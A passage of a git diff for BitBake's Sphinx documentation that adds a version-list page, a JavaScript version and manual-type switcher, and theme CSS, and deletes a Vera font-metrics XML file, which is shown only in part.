+- :yocto_docs:`2.5.3 BitBake User Manual </2.5.3/bitbake-user-manual/bitbake-user-manual.html>`
+
+**************************
+2.4 'rocko' Release Series
+**************************
+
+- :yocto_docs:`2.4 BitBake User Manual </2.4/bitbake-user-manual/bitbake-user-manual.html>`
+- :yocto_docs:`2.4.1 BitBake User Manual </2.4.1/bitbake-user-manual/bitbake-user-manual.html>`
+- :yocto_docs:`2.4.2 BitBake User Manual </2.4.2/bitbake-user-manual/bitbake-user-manual.html>`
+- :yocto_docs:`2.4.3 BitBake User Manual </2.4.3/bitbake-user-manual/bitbake-user-manual.html>`
+- :yocto_docs:`2.4.4 BitBake User Manual </2.4.4/bitbake-user-manual/bitbake-user-manual.html>`
+
+*************************
+2.3 'pyro' Release Series
+*************************
+
+- :yocto_docs:`2.3 BitBake User Manual </2.3/bitbake-user-manual/bitbake-user-manual.html>`
+- :yocto_docs:`2.3.1 BitBake User Manual </2.3.1/bitbake-user-manual/bitbake-user-manual.html>`
+- :yocto_docs:`2.3.2 BitBake User Manual </2.3.2/bitbake-user-manual/bitbake-user-manual.html>`
+- :yocto_docs:`2.3.3 BitBake User Manual </2.3.3/bitbake-user-manual/bitbake-user-manual.html>`
+- :yocto_docs:`2.3.4 BitBake User Manual </2.3.4/bitbake-user-manual/bitbake-user-manual.html>`
+
+**************************
+2.2 'morty' Release Series
+**************************
+
+- :yocto_docs:`2.2 BitBake User Manual </2.2/bitbake-user-manual/bitbake-user-manual.html>`
+- :yocto_docs:`2.2.1 BitBake User Manual </2.2.1/bitbake-user-manual/bitbake-user-manual.html>`
+- :yocto_docs:`2.2.2 BitBake User Manual </2.2.2/bitbake-user-manual/bitbake-user-manual.html>`
+- :yocto_docs:`2.2.3 BitBake User Manual </2.2.3/bitbake-user-manual/bitbake-user-manual.html>`
+
+****************************
+2.1 'krogoth' Release Series
+****************************
+
+- :yocto_docs:`2.1 BitBake User Manual </2.1/bitbake-user-manual/bitbake-user-manual.html>`
+- :yocto_docs:`2.1.1 BitBake User Manual </2.1.1/bitbake-user-manual/bitbake-user-manual.html>`
+- :yocto_docs:`2.1.2 BitBake User Manual </2.1.2/bitbake-user-manual/bitbake-user-manual.html>`
+- :yocto_docs:`2.1.3 BitBake User Manual </2.1.3/bitbake-user-manual/bitbake-user-manual.html>`
+
+***************************
+2.0 'jethro' Release Series
+***************************
+
+- :yocto_docs:`1.9 BitBake User Manual </1.9/bitbake-user-manual/bitbake-user-manual.html>`
+- :yocto_docs:`2.0 BitBake User Manual </2.0/bitbake-user-manual/bitbake-user-manual.html>`
+- :yocto_docs:`2.0.1 BitBake User Manual </2.0.1/bitbake-user-manual/bitbake-user-manual.html>`
+- :yocto_docs:`2.0.2 BitBake User Manual </2.0.2/bitbake-user-manual/bitbake-user-manual.html>`
+- :yocto_docs:`2.0.3 BitBake User Manual </2.0.3/bitbake-user-manual/bitbake-user-manual.html>`
+
+*************************
+1.8 'fido' Release Series
+*************************
+
+- :yocto_docs:`1.8 BitBake User Manual </1.8/bitbake-user-manual/bitbake-user-manual.html>`
+- :yocto_docs:`1.8.1 BitBake User Manual </1.8.1/bitbake-user-manual/bitbake-user-manual.html>`
+- :yocto_docs:`1.8.2 BitBake User Manual </1.8.2/bitbake-user-manual/bitbake-user-manual.html>`
+
+**************************
+1.7 'dizzy' Release Series
+**************************
+
+- :yocto_docs:`1.7 BitBake User Manual </1.7/bitbake-user-manual/bitbake-user-manual.html>`
+- :yocto_docs:`1.7.1 BitBake User Manual </1.7.1/bitbake-user-manual/bitbake-user-manual.html>`
+- :yocto_docs:`1.7.2 BitBake User Manual </1.7.2/bitbake-user-manual/bitbake-user-manual.html>`
+- :yocto_docs:`1.7.3 BitBake User Manual </1.7.3/bitbake-user-manual/bitbake-user-manual.html>`
+
+**************************
+1.6 'daisy' Release Series
+**************************
+
+- :yocto_docs:`1.6 BitBake User Manual </1.6/bitbake-user-manual/bitbake-user-manual.html>`
+- :yocto_docs:`1.6.1 BitBake User Manual </1.6.1/bitbake-user-manual/bitbake-user-manual.html>`
+- :yocto_docs:`1.6.2 BitBake User Manual </1.6.2/bitbake-user-manual/bitbake-user-manual.html>`
+- :yocto_docs:`1.6.3 BitBake User Manual </1.6.3/bitbake-user-manual/bitbake-user-manual.html>`
+
diff --git a/bitbake/doc/sphinx-static/switchers.js b/bitbake/doc/sphinx-static/switchers.js
new file mode 100644
index 0000000000..32113cfa96
--- /dev/null
+++ b/bitbake/doc/sphinx-static/switchers.js
@@ -0,0 +1,233 @@
+(function() {
+  'use strict';
+
+  var all_versions = {
+    'dev': 'dev (3.2)',
+    '3.1.2': '3.1.2',
+    '3.0.3': '3.0.3',
+    '2.7.4': '2.7.4',
+  };
+
+  var all_doctypes = {
+      'single': 'Individual Webpages',
+      'mega': "All-in-one 'Mega' Manual",
+  };
+
+  // Simple version comparision
+  // Return 1 if a > b
+  // Return -1 if a < b
+  // Return 0 if a == b
+  function ver_compare(a, b) {
+    if (a == "dev") {
+       return 1;
+    }
+
+    if (a === b) {
+       return 0;
+    }
+
+    var a_components = a.split(".");
+    var b_components = b.split(".");
+
+    var len = Math.min(a_components.length, b_components.length);
+
+    // loop while the components are equal
+    for (var i = 0; i < len; i++) {
+        // A bigger than B
+        if (parseInt(a_components[i]) > parseInt(b_components[i])) {
+            return 1;
+        }
+
+        // B bigger than A
+        if (parseInt(a_components[i]) < parseInt(b_components[i])) {
+            return -1;
+        }
+    }
+
+    // If one's a prefix of the other, the longer one is greater.
+    if (a_components.length > b_components.length) {
+        return 1;
+    }
+
+    if (a_components.length < b_components.length) {
+        return -1;
+    }
+
+    // Otherwise they are the same.
+    return 0;
+  }
+
+  function build_version_select(current_series, current_version) {
+    var buf = ['<select>'];
+
+    $.each(all_versions, function(version, title) {
+      var series = version.substr(0, 3);
+      if (series == current_series) {
+        if (version == current_version)
+            buf.push('<option value="' + version + '" selected="selected">' + title + '</option>');
+        else
+            buf.push('<option value="' + version + '">' + title + '</option>');
+
+        if (version != current_version)
+            buf.push('<option value="' + current_version + '" selected="selected">' + current_version + '</option>');
+      } else {
+        buf.push('<option value="' + version + '">' + title + '</option>');
+      }
+    });
+
+    buf.push('</select>');
+    return buf.join('');
+  }
+
+  function build_doctype_select(current_doctype) {
+    var buf = ['<select>'];
+
+    $.each(all_doctypes, function(doctype, title) {
+      if (doctype == current_doctype)
+        buf.push('<option value="' + doctype + '" selected="selected">' +
+                 all_doctypes[current_doctype] + '</option>');
+      else
+        buf.push('<option value="' + doctype + '">' + title + '</option>');
+    });
+    if (!(current_doctype in all_doctypes)) {
+        // In case we're browsing a doctype that is not yet in all_doctypes.
+        buf.push('<option value="' + current_doctype + '" selected="selected">' +
+                 current_doctype + '</option>');
+        all_doctypes[current_doctype] = current_doctype;
+    }
+    buf.push('</select>');
+    return buf.join('');
+  }
+
+  function navigate_to_first_existing(urls) {
+    // Navigate to the first existing URL in urls.
+    var url = urls.shift();
+
+    // Web browsers won't redirect file:// urls to file urls using ajax but
+    // its useful for local testing
+    if (url.startsWith("file://")) {
+      window.location.href = url;
+      return;
+    }
+
+    if (urls.length == 0) {
+      window.location.href = url;
+      return;
+    }
+    $.ajax({
+      url: url,
+      success: function() {
+        window.location.href = url;
+      },
+      error: function() {
+        navigate_to_first_existing(urls);
+      }
+    });
+  }
+
+  function get_docroot_url() {
+    var url = window.location.href;
+    var root = DOCUMENTATION_OPTIONS.URL_ROOT;
+
+    var urlarray = url.split('/');
+    // Trim off anything after '/'
+    urlarray.pop();
+    var depth = (root.match(/\.\.\//g) || []).length;
+    for (var i = 0; i < depth; i++) {
+      urlarray.pop();
+    }
+
+    return urlarray.join('/') + '/';
+  }
+
+  function on_version_switch() {
+    var selected_version = $(this).children('option:selected').attr('value');
+    var url = window.location.href;
+    var current_version = DOCUMENTATION_OPTIONS.VERSION;
+    var docroot = get_docroot_url()
+
+    var new_versionpath = selected_version + '/';
+    if (selected_version == "dev")
+        new_versionpath = '';
+
+    // dev versions have no version prefix
+    if (current_version == "dev") {
+        var new_url = docroot + new_versionpath + url.replace(docroot, "");
+        var fallback_url = docroot + new_versionpath;
+    } else {
+        var new_url = url.replace('/' + current_version + '/', '/' + new_versionpath);
+        var fallback_url = new_url.replace(url.replace(docroot, ""), "");
+    }
+
+    console.log(get_docroot_url())
+    console.log(url + " to url " + new_url);
+    console.log(url + " to fallback " + fallback_url);
+
+    if (new_url != url) {
+      navigate_to_first_existing([
+        new_url,
+        fallback_url,
+        'https://www.yoctoproject.org/docs/',
+      ]);
+    }
+  }
+
+  function on_doctype_switch() {
+    var selected_doctype = $(this).children('option:selected').attr('value');
+    var url = window.location.href;
+    if (selected_doctype == 'mega') {
+      var docroot = get_docroot_url()
+      var current_version = DOCUMENTATION_OPTIONS.VERSION;
+      // Assume manuals before 3.2 are using old docbook mega-manual
+      if (ver_compare(current_version, "3.2") < 0) {
+        var new_url = docroot + "mega-manual/mega-manual.html";
+      } else {
+        var new_url = docroot + "singleindex.html";
+      }
+    } else {
+      var new_url = url.replace("singleindex.html", "index.html")
+    }
+
+    if (new_url != url) {
+      navigate_to_first_existing([
+        new_url,
+        'https://www.yoctoproject.org/docs/',
+      ]);
+    }
+  }
+
+  // Returns the current doctype based upon the url
+  function doctype_segment_from_url(url) {
+    if (url.includes("singleindex") || url.includes("mega-manual"))
+      return "mega";
+    return "single";
+  }
+
+  $(document).ready(function() {
+    var release = DOCUMENTATION_OPTIONS.VERSION;
+    var current_doctype = doctype_segment_from_url(window.location.href);
+    var current_series = release.substr(0, 3);
+    var version_select = build_version_select(current_series, release);
+
+    $('.version_switcher_placeholder').html(version_select);
+    $('.version_switcher_placeholder select').bind('change', on_version_switch);
+
+    var doctype_select = build_doctype_select(current_doctype);
+
+    $('.doctype_switcher_placeholder').html(doctype_select);
+    $('.doctype_switcher_placeholder select').bind('change', on_doctype_switch);
+
+    if (ver_compare(release, "3.1") < 0) {
+      $('#outdated-warning').html('Version ' + release + ' of the project is now considered obsolete, please select and use a more recent version');
+      $('#outdated-warning').css('padding', '.5em');
+    } else if (release != "dev") {
+      $.each(all_versions, function(version, title) {
+        var series = version.substr(0, 3);
+        if (series == current_series && version != release) {
+          $('#outdated-warning').html('This document is for outdated version ' + release + ', you should select the latest release version in this series, ' + version + '.');
+          $('#outdated-warning').css('padding', '.5em');
+        }
+      });
+    }
+  });
+})();
diff --git a/bitbake/doc/sphinx-static/theme_overrides.css b/bitbake/doc/sphinx-static/theme_overrides.css
new file mode 100644
index 0000000000..e362677a7f
--- /dev/null
+++ b/bitbake/doc/sphinx-static/theme_overrides.css
@@ -0,0 +1,162 @@
+/*
+    SPDX-License-Identifier: CC-BY-2.0-UK
+*/
+
+body {
+  font-family: Verdana, Sans, sans-serif;
+  margin:  0em auto;
+  color: #333;
+}
+
+h1,h2,h3,h4,h5,h6,h7 {
+  font-family: Arial, Sans;
+  color: #00557D;
+  clear: both;
+}
+
+h1 {
+  font-size: 2em;
+  text-align: left;
+  padding: 0em 0em 0em 0em;
+  margin: 2em 0em 0em 0em;
+}
+
+h2.subtitle {
+  margin: 0.10em 0em 3.0em 0em;
+  padding: 0em 0em 0em 0em;
+  font-size: 1.8em;
+  padding-left: 20%;
+  font-weight: normal;
+  font-style: italic;
+}
+
+h2 {
+  margin: 2em 0em 0.66em 0em;
+  padding: 0.5em 0em 0em 0em;
+  font-size: 1.5em;
+  font-weight: bold;
+}
+
+h3.subtitle {
+  margin: 0em 0em 1em 0em;
+  padding: 0em 0em 0em 0em;
+  font-size: 142.14%;
+  text-align: right;
+}
+
+h3 {
+  margin: 1em 0em 0.5em 0em;
+  padding: 1em 0em 0em 0em;
+  font-size: 140%;
+  font-weight: bold;
+}
+
+h4 {
+  margin: 1em 0em 0.5em 0em;
+  padding: 1em 0em 0em 0em;
+  font-size: 120%;
+  font-weight: bold;
+}
+
+h5 {
+  margin: 1em 0em 0.5em 0em;
+  padding: 1em 0em 0em 0em;
+  font-size: 110%;
+  font-weight: bold;
+}
+
+h6 {
+  margin: 1em 0em 0em 0em;
+  padding: 1em 0em 0em 0em;
+  font-size: 110%;
+  font-weight: bold;
+}
+
+em {
+  font-weight: bold;
+}
+
+.pre {
+  font-size: medium;
+  font-family: Courier, monospace;
+}
+
+.wy-nav-content a {
+  text-decoration: underline;
+  color: #444;
+  background: transparent;
+}
+
+.wy-nav-content a:hover {
+  text-decoration: underline;
+  background-color: #dedede;
+}
+
+.wy-nav-content a:visited {
+  color: #444;
+}
+
+[alt='Permalink'] { color: #eee; }
+[alt='Permalink']:hover { color: black; }
+
+@media screen {
+    /* content column
+     *
+     * RTD theme's default is 800px as max width for the content, but we have
+     * tables with tons of columns, which need the full width of the view-port.
+     */
+
+    .wy-nav-content{max-width: none; }
+
+    /* inline literal: drop the borderbox, padding and red color */
+    code, .rst-content tt, .rst-content code {
+        color: inherit;
+        border: none;
+        padding: unset;
+        background: inherit;
+        font-size: 85%;
+    }
+
+    .rst-content tt.literal,.rst-content tt.literal,.rst-content code.literal {
+        color: inherit;
+    }
+
+    /* Admonition should be gray, not blue or green */
+    .rst-content .note .admonition-title,
+    .rst-content .tip .admonition-title,
+    .rst-content .warning .admonition-title,
+    .rst-content .caution .admonition-title,
+    .rst-content .important .admonition-title {
+        background: #f0f0f2;
+        color: #00557D;
+
+    }
+
+    .rst-content .note,
+    .rst-content .tip,
+    .rst-content .important,
+    .rst-content .warning,
+    .rst-content .caution  {
+        background: #f0f0f2;
+    }
+
+    /* Remove the icon in front of note/tip element, and before the logo */
+    .icon-home:before, .rst-content .admonition-title:before {
+        display: none
+    }
+
+    /* a custom informalexample container is used in some doc */
+    .informalexample {
+        border: 1px solid;
+        border-color: #aaa;
+        margin: 1em 0em;
+        padding: 1em;
+        page-break-inside: avoid;
+    }
+
+    /* Remove the blue background in the top left corner, around the logo */
+    .wy-side-nav-search {
+        background: inherit;
+    }
+
+}
diff --git a/bitbake/doc/template/Vera.xml b/bitbake/doc/template/Vera.xml
deleted file mode 100644
index 3c82043e35..0000000000
--- a/bitbake/doc/template/Vera.xml
+++ /dev/null
@@ -1 +0,0 @@
-<?xml version="1.0" encoding="UTF-8"?><font-metrics type="TYPE0"><font-name>BitstreamVeraSans</font-name><embed/><cap-height>729</cap-height><x-height>546</x-height><ascender>928</ascender><descender>-235</descender><bbox><left>-183</left><bottom>-235</bottom><right>1287</right><top>928</top></bbox><flags>32</flags><stemv>0</stemv><italicangle>0</italicangle><subtype>TYPE0</subtype><multibyte-extras><cid-type>CIDFontType2</cid-type><default-width>0</default-width><bfranges><bf gi="3" ue="126" us="32"/><bf gi="172" ue="160" us="160"/><bf gi="163" ue="161" us="161"/><bf gi="132" ue="163" us="162"/><bf gi="189" ue="164" us="164"/><bf gi="150" ue="165" us="165"/><bf gi="231" ue="166" us="166"/><bf gi="134" ue="167" us="167"/><bf gi="142" ue="168" us="168"/><bf gi="139" ue="169" us="169"/><bf gi="157" ue="170" us="170"/><bf gi="169" ue="171" us="171"/><bf gi="164" ue="172" us="172"/><bf gi="256" ue="173" us="173"/><bf gi="138" ue="174" us="174"/><bf gi="217" ue="175" us="175"/><bf gi="131" ue="176" us="176"/><bf gi="147" ue="177" us="177"/><bf gi="241" ue="179" us="178"/><bf gi="141" ue="180" us="180"/><bf gi="151" ue="181" us="181"/><bf gi="136" ue="182" us="182"/><bf gi="195" ue="183" us="183"/><bf gi="221" ue="184" us="184"/><bf gi="240" ue="185" us="185"/><bf gi="158" ue="186" us="186"/><bf gi="170" ue="187" us="187"/><bf gi="243" ue="190" us="188"/><bf gi="162" ue="191" us="191"/><bf gi="173" ue="192" us="192"/><bf gi="201" ue="193" us="193"/><bf gi="199" ue="194" us="194"/><bf gi="174" ue="195" us="195"/><bf gi="98" ue="197" us="196"/><bf gi="144" ue="198" us="198"/><bf gi="100" ue="199" us="199"/><bf gi="203" ue="200" us="200"/><bf gi="101" ue="201" us="201"/><bf gi="200" ue="202" us="202"/><bf gi="202" ue="203" us="203"/><bf gi="207" ue="204" us="204"/><bf gi="204" ue="207" us="205"/><bf gi="232" ue="208" us="208"/><bf gi="102" ue="209" us="209"/><bf gi="210" ue="210" us="210"/><bf gi="208" ue="212" us="211"/><bf gi="175" ue="213" us="213"/><bf gi="103" ue="214" us="214"/><bf gi="239" ue="215" us="215"/><bf gi="145" ue="216" us="216"/><bf gi="213" ue="217" us="217"/><bf gi="211" ue="219" us="218"/><bf gi="104" ue="220" us="220"/><bf gi="234" ue="221" us="221"/><bf gi="236" ue="222" us="222"/><bf gi="137" ue="223" us="223"/><bf gi="106" ue="224" us="224"/><bf gi="105" ue="225" us="225"/><bf gi="107" ue="226" us="226"/><bf gi="109" ue="227" us="227"/><bf gi="108" ue="228" us="228"/><bf gi="110" ue="229" us="229"/><bf gi="160" ue="230" us="230"/><bf gi="111" ue="231" us="231"/><bf gi="113" ue="232" us="232"/><bf gi="112" ue="233" us="233"/><bf gi="114" ue="235" us="234"/><bf gi="117" ue="236" us="236"/><bf gi="116" ue="237" us="237"/><bf gi="118" ue="239" us="238"/><bf gi="233" ue="240" us="240"/><bf gi="120" ue="241" us="241"/><bf gi="122" ue="242" us="242"/><bf gi="121" ue="243" us="243"/><bf gi="123" ue="244" us="244"/><bf gi="125" ue="245" us="245"/><bf gi="124" ue="246" us="246"/><bf gi="184" ue="247" us="247"/><bf gi="161" ue="248" us="248"/><bf gi="127" ue="249" us="249"/><bf gi="126" ue="250" us="250"/><bf gi="128" ue="252" us="251"/><bf gi="235" ue="253" us="253"/><bf gi="237" ue="254" us="254"/><bf gi="186" ue="255" us="255"/><bf gi="251" ue="263" us="262"/><bf gi="253" ue="269" us="268"/><bf gi="0" ue="270" us="270"/><bf gi="0" ue="271" us="271"/><bf gi="0" ue="272" us="272"/><bf gi="255" ue="273" us="273"/><bf gi="246" ue="287" us="286"/><bf gi="248" ue="304" us="304"/><bf gi="214" ue="305" us="305"/><bf gi="225" ue="322" us="321"/><bf gi="176" ue="339" us="338"/><bf gi="249" ue="351" us="350"/><bf gi="227" ue="353" us="352"/><bf gi="187" ue="376" us="376"/><bf gi="229" ue="382" us="381"/><bf gi="166" ue="402" us="402"/><bf gi="215" ue="710" us="710"/><bf gi="224" ue="711" us="711"/><bf gi="218" ue="730" us="728"/><bf gi="223" ue="731" us="731"/><bf gi="216" ue="732" us="732"/><bf gi="222" ue="733" us="733"/><bf gi="159" ue="937" us="937"/><bf gi="155" ue="960" us="960"/><bf gi="178" ue="8212" us="8211"/><bf gi="0" ue="8213" us="8213"/><bf gi="0" ue="8214" us="8214"/><bf gi="0" ue="8215" us="8215"/><bf gi="182" ue="8217" us="8216"/><bf gi="196" ue="8218" us="8218"/><bf gi="0" ue="8219" us="8219"/><bf gi="180" ue="8221" us="8220"/><bf gi="197" ue="8222" us="8222"/><bf gi="0" ue="8223" us="8223"/><bf gi="130" ue="8224" us="8224"/><bf gi="194" ue="8225" us="8225"/><bf gi="135" ue="8226" us="8226"/><bf gi="0" ue="8227" us="8227"/><bf gi="0" ue="8228" us="8228"/><bf gi="0" ue="8229" us="8229"/><bf gi="171" ue="8230" us="8230"/><bf gi="198" ue="8240" us="8240"/><bf gi="190" ue="8250" us="8249"/><bf gi="258" ue="8364" us="8364"/><bf gi="140" ue="8482" us="8482"/><bf gi="152" ue="8706" us="8706"/><bf gi="0" ue="8707" us="8707"/><bf gi="0" ue="8708" us="8708"/><bf gi="0" ue="8709" us="8709"/><bf gi="168" ue="8710" us="8710"/><bf gi="154" ue="8719" us="8719"/><bf gi="0" ue="8720" us="8720"/><bf gi="153" ue="8721" us="8721"/><bf gi="238" ue="8722" us="8722"/><bf gi="0" ue="8723" us="8723"/><bf gi="0" ue="8724" us="8724"/><bf gi="188" ue="8725" us="8725"/><bf gi="0" ue="8726" us="8726"/><bf gi="0" ue="8727" us="8727"/><bf gi="0" ue="8728" us="8728"/><bf gi="257" ue="8729" us="8729"/><bf gi="165" ue="8730" us="8730"/><bf gi="0" ue="8731" us="8731"/><bf gi="0" ue="8732" us="8732"/><bf gi="0" ue="8733" us="8733"/><bf gi="146" ue="8734" us="8734"/><bf gi="156" ue="8747" us="8747"/><bf gi="167" ue="8776" us="8776"/><bf gi="143" ue="8800" us="8800"/><bf gi="0" ue="8801" us="8801"/><bf gi="0" ue="8802" us="8802"/><bf gi="0" ue="8803" us="8803"/><bf gi="148" ue="8805" us="8804"/><bf gi="185" ue="9674" us="9674"/><bf gi="192" ue="64258" us="64257"/><bf gi="0" ue="65535" us="65535"/></bfranges><cid-widths start-index="0"><wx w="600"/><wx w="0"/><wx w="317"/><wx w="317"/><wx w="400"/><wx w="459"/><wx w="837"/><wx w="636"/><wx w="950"/><wx w="779"/><wx w="274"/><wx w="390"/><wx w="390"/><wx w="500"/><wx w="837"/><wx w="317"/><wx w="360"/><wx w="317"/><wx w="336"/><wx w="636"/><wx w="636"/><wx w="636"/><wx w="636"/><wx w="636"/><wx w="636"/><wx w="636"/><wx w="636"/><wx w="636"/><wx w="636"/><wx w="336"/><wx w="336"/><wx w="837"/><wx w="837"/><wx w="837"/><wx w="530"/><wx w="1000"/><wx w="684"/><wx w="686"/><wx w="698"/><wx w="770"/><wx w="631"/><wx w="575"/><wx w="774"/><wx w="751"/><wx w="294"/><wx w="294"/><wx w="655"/><wx w="557"/><wx w="862"/><wx w="748"/><wx w="787"/><wx w="603"/><wx w="787"/><wx w="694"/><wx w="634"/><wx w="610"/><wx w="731"/><wx w="684"/><wx w="988"/><wx w="685"/><wx w="610"/><wx w="685"/><wx w="390"/><wx w="336"/><wx w="390"/><wx w="837"/><wx w="500"/><wx w="500"/><wx w="612"/><wx w="634"/><wx w="549"/><wx w="634"/><wx w="615"/><wx w="352"/><wx w="634"/><wx w="633"/><wx w="277"/><wx w="277"/><wx w="579"/><wx w="277"/><wx w="974"/><wx w="633"/><wx w="611"/><wx w="634"/><wx w="634"/><wx w="411"/><wx w="520"/><wx w="392"/><wx w="633"/><wx w="591"/><wx w="817"/><wx w="591"/><wx w="591"/><wx w="524"/><wx w="636"/><wx w="336"/><wx w="636"/><wx w="837"/><wx w="684"/><wx w="684"/><wx w="698"/><wx w="631"/><wx w="748"/><wx w="787"/><wx w="731"/><wx w="612"/><wx w="612"/><wx w="612"/><wx w="612"/><wx w="612"/><wx w="612"/><wx w="549"/><wx w="615"/><wx w="615"/><wx w="615"/><wx w="615"/><wx w="277"/><wx w="277"/><wx w="277"/><wx w="277"/><wx w="633"/><wx w="611"/><wx w="611"/><wx w="611"/><wx w="611"/><wx w="611"/><wx w="633"/><wx w="633"/><wx w="633"/><wx w="633"/><wx w="500"/><wx w="500"/><wx w="636"/><wx w="636"/><wx w="500"/><wx w="589"/><wx w="636"/><wx w="629"/><wx w="1000"/><wx w="1000"/><wx w="1000"/><wx w="500"/><wx w="500"/><wx w="837"/><wx w="974"/><wx w="787"/><wx w="833"/><wx w="837"/><wx w="837"/><wx w="837"/><wx w="636"/><wx w="636"/><wx w="517"/><wx w="673"/><wx w="756"/><wx w="588"/><wx w="520"/><wx w="471"/><wx w="471"/><wx w="764"/><wx w="981"/><wx w="611"/><wx w="530"/><wx w="400"/><wx w="837"/><wx w="637"/><wx w="636"/><wx w="837"/><wx w="668"/><wx w="611"/><wx w="611"/><wx w="1000"/><wx w="636"/><wx w="684"/><wx w="684"/><wx w="787"/><wx w="1069"/><wx w="1022"/><wx w="500"/><wx w="1000"/><wx w="518"/><wx w="518"/><wx w="317"/><wx w="317"/><wx w="837"/><wx w="494"/><wx w="591"/><wx w="610"/><wx w="166"/><wx w="636"/><wx w="399"/><wx w="399"/><wx w="629"/><wx w="629"/><wx w="500"/><wx w="317"/><wx w="317"/><wx w="518"/><wx w="1341"/><wx w="684"/><wx w="631"/><wx w="684"/><wx w="631"/><wx w="631"/><wx w="294"/><wx w="294"/><wx w="294"/><wx w="294"/><wx w="787"/><wx w="787"/><wx w="787"/><wx w="731"/><wx w="731"/><wx w="731"/><wx w="277"/><wx w="500"/><wx w="500"/><wx w="500"/><wx w="500"/><wx w="500"/><wx w="500"/><wx w="500"/><wx w="500"/><wx w="500"/><wx w="500"/><wx w="562"/><wx w="284"/><wx w="634"/><wx w="520"/><wx w="685"/><wx w="524"/><wx w="336"/><wx w="774"/><wx w="611"/><wx w="610"/><wx w="591"/><wx w="604"/><wx w="634"/><wx w="837"/><wx w="837"/><wx w="400"/><wx w="400"/><wx w="400"/><wx w="969"/><wx w="969"/><wx w="969"/><wx w="774"/><wx w="634"/><wx w="294"/><wx w="634"/><wx w="520"/><wx w="698"/><wx w="549"/><wx w="698"/><wx w="549"/><wx w="634"/><wx w="360"/><wx w="317"/><wx w="636"/><wx w="500"/><wx w="500"/><wx w="500"/><wx w="500"/><wx w="500"/><wx w="500"/><wx w="400"/><wx w="500"/><wx w="500"/></cid-widths></multibyte-extras><kerning kpx1="246"><pair kern="-21" kpx2="180"/><pair kern="-17" kpx2="169"/><pair kern="-26" kpx2="197"/><pair kern="-35" kpx2="55"/><pair kern="-49" kpx2="60"/><pair kern="-49" kpx2="187"/><pair kern="-21" kpx2="181"/><pair kern="-17" kpx2="170"/><pair kern="-49" kpx2="234"/></kerning><kerning kpx1="235"><pair kern="-142" kpx2="17"/><pair kern="-17" kpx2="169"/><pair kern="-146" kpx2="197"/><pair kern="-17" kpx2="16"/><pair kern="-72" kpx2="29"/><pair kern="-17" kpx2="170"/></kerning><kerning kpx1="43"><pair kern="-35" kpx2="180"/><pair kern="-17" kpx2="17"/><pair kern="-35" kpx2="197"/><pair kern="-30" kpx2="181"/></kerning><kerning kpx1="16"><pair kern="36" kpx2="246"/><pair kern="-17" kpx2="235"/><pair kern="-21" kpx2="199"/><pair kern="18" kpx2="123"/><pair kern="27" kpx2="208"/><pair kern="-118" kpx2="187"/><pair kern="-49" kpx2="59"/><pair kern="18" kpx2="124"/><pair kern="-21" kpx2="201"/><pair kern="-118" kpx2="60"/><pair kern="36" kpx2="52"/><pair kern="18" kpx2="125"/><pair kern="36" kpx2="42"/><pair kern="-118" kpx2="234"/><pair kern="18" kpx2="122"/><pair kern="27" kpx2="210"/><pair kern="-21" kpx2="36"/><pair kern="18" kpx2="82"/><pair kern="-40" kpx2="58"/><pair kern="-91" kpx2="55"/><pair kern="-17" kpx2="186"/><pair kern="27" kpx2="175"/><pair kern="27" kpx2="50"/><pair kern="27" kpx2="209"/><pair kern="27" kpx2="103"/><pair kern="-21" kpx2="98"/><pair kern="55" kpx2="45"/><pair kern="-21" kpx2="173"/><pair kern="-17" kpx2="92"/><pair kern="-26" kpx2="89"/><pair kern="18" kpx2="121"/><pair kern="-58" kpx2="57"/><pair kern="-35" kpx2="37"/><pair kern="-21" kpx2="174"/></kerning><kerning kpx1="112"><pair kern="-17" kpx2="91"/></kerning><kerning kpx1="123"><pair kern="-72" kpx2="180"/><pair kern="-17" kpx2="17"/><pair kern="-63" kpx2="197"/><pair kern="18" kpx2="16"/><pair kern="-30" kpx2="91"/><pair kern="-35" kpx2="181"/></kerning><kerning kpx1="251"><pair kern="-17" kpx2="169"/><pair kern="-17" kpx2="60"/><pair kern="-17" kpx2="187"/><pair kern="18" kpx2="181"/><pair kern="-17" kpx2="170"/><pair kern="-17" kpx2="234"/></kerning><kerning kpx1="213"><pair kern="-17" kpx2="229"/><pair kern="-17" kpx2="61"/></kerning><kerning kpx1="208"><pair kern="-17" kpx2="36"/><pair kern="-17" kpx2="199"/><pair kern="27" kpx2="16"/><pair kern="-54" kpx2="187"/><pair kern="-17" kpx2="98"/><pair kern="-17" kpx2="181"/><pair kern="-63" kpx2="59"/><pair kern="-40" kpx2="17"/><pair kern="-21" kpx2="180"/><pair kern="-17" kpx2="173"/><pair kern="-17" kpx2="169"/><pair kern="-91" kpx2="197"/><pair kern="-17" kpx2="201"/><pair kern="-54" kpx2="60"/><pair kern="-17" kpx2="29"/><pair kern="-17" kpx2="57"/><pair kern="-17" kpx2="174"/><pair kern="-54" kpx2="234"/></kerning><kerning kpx1="187"><pair kern="-114" kpx2="126"/><pair kern="-137" kpx2="107"/><pair kern="-132" kpx2="72"/><pair kern="-77" kpx2="199"/><pair kern="-118" kpx2="16"/><pair kern="-132" kpx2="123"/><pair kern="-132" kpx2="112"/><pair kern="-54" kpx2="251"/><pair kern="-54" kpx2="208"/><pair kern="-132" kpx2="113"/><pair kern="-54" kpx2="180"/><pair kern="-137" kpx2="105"/><pair kern="-114" kpx2="129"/><pair kern="-132" kpx2="124"/><pair kern="-109" kpx2="169"/><pair kern="-77" kpx2="201"/><pair kern="-54" kpx2="253"/><pair kern="-137" kpx2="106"/><pair kern="-132" kpx2="29"/><pair kern="-132" kpx2="125"/><pair kern="-72" kpx2="170"/><pair kern="-132" kpx2="115"/><pair kern="-114" kpx2="88"/><pair kern="-132" kpx2="122"/><pair kern="-54" kpx2="100"/><pair kern="-137" kpx2="68"/><pair kern="-54" kpx2="210"/><pair kern="-77" kpx2="36"/><pair kern="-132" kpx2="82"/><pair kern="-132" kpx2="114"/><pair kern="-54" kpx2="175"/><pair kern="-114" kpx2="127"/><pair kern="-54" kpx2="50"/><pair kern="-54" kpx2="209"/><pair kern="-54" kpx2="103"/><pair kern="-137" kpx2="108"/><pair kern="-77" kpx2="98"/><pair kern="-35" kpx2="76"/><pair kern="-17" kpx2="181"/><pair kern="-202" kpx2="17"/><pair kern="-114" kpx2="128"/><pair kern="-77" kpx2="173"/><pair kern="-137" kpx2="109"/><pair kern="-128" kpx2="197"/><pair kern="-54" kpx2="38"/><pair kern="-132" kpx2="121"/><pair kern="-137" kpx2="110"/><pair kern="-77" kpx2="174"/></kerning><kerning kpx1="113"><pair kern="-17" kpx2="91"/></kerning><kerning kpx1="144"><pair kern="-40" 